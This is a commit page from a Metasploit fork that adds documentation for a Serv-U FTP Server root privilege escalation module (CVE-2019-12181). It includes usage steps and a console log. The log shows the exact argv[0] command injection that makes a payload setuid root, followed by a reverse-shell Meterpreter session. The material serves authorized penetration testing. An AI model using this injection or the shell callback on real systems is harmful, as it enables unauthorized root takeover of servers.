adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Land #12030, CVE-2019-12181: Serv-U FTP Server prepareinstallation privesc

Browse Source
This commit is contained in:
asoto-r7
2019-07-01 16:01:04 -05:00
parent d723122e0e 895a5b6aec
commit d3056723e1
2 changed files with 248 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/linux/local/servu_ftp_server_prepareinstallation_priv_esc.md
+76
View File
@@ -0,0 +1,76 @@
## Description
This module attempts to gain root privileges on systems running
Serv-U FTP Server versions prior to 15.1.7.
The `Serv-U` executable is setuid `root`, and uses `ARGV[0]`
in a call to `system()`, without validation, when invoked with
the `-prepareinstallation` flag, resulting in command execution
with root privileges.
## Vulnerable Application
[Serv-U FTP Server](https://www.serv-u.com/ftp-server-software)
is an FTP server for Linux and Windows; however, this module
targets only Linux systems.
This module has been tested successfully on:
* Serv-U FTP Server version 15.1.6 (x64) on Debian 9.6 (x64)
## Verification Steps
1. Start `msfconsole`
2. Get a session
3. `use exploit/linux/local/servu_ftp_server_prepareinstallation_priv_esc`
4. `set SESSION [SESSION]`
5. `check`
6. `run`
7. You should get a new *root* session
## Options
**SERVU_PATH**
Path to `Serv-U` executable (default: `/usr/local/Serv-U/Serv-U`)
**WritableDir**
A writable directory file system path. (default: `/tmp`)
## Scenarios
### Debian 9.6 (x64)
```
msf5 exploit(multi/handler) > back
msf5 > use exploit/linux/local/servu_ftp_server_prepareinstallation_priv_esc
msf5 exploit(linux/local/servu_ftp_server_prepareinstallation_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/servu_ftp_server_prepareinstallation_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/servu_ftp_server_prepareinstallation_priv_esc) > run
[*] Started reverse TCP handler on 172.16.191.165:4444
[+] bash shell is available
[+] /usr/local/Serv-U/Serv-U is executable
[+] /usr/local/Serv-U/Serv-U is setuid
[*] Writing '/tmp/.24HnCiwSby' (277 bytes) ...
[*] Executing command: bash -c 'exec -a "\";chown root /tmp/.24HnCiwSby;chmod u+s /tmp/.24HnCiwSby;chmod +x /tmp/.24HnCiwSby\"" /usr/local/Serv-U/Serv-U -prepareinstallation'
[+] /tmp/.24HnCiwSby setuid root successfully
[*] Executing payload...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (985320 bytes) to 172.16.191.250
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.250:58662) at 2019-06-28 23:46:48 -0400
[-] Failed to delete /tmp/.24HnCiwSby: stdapi_fs_delete_file: Operation failed: 1
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter >
```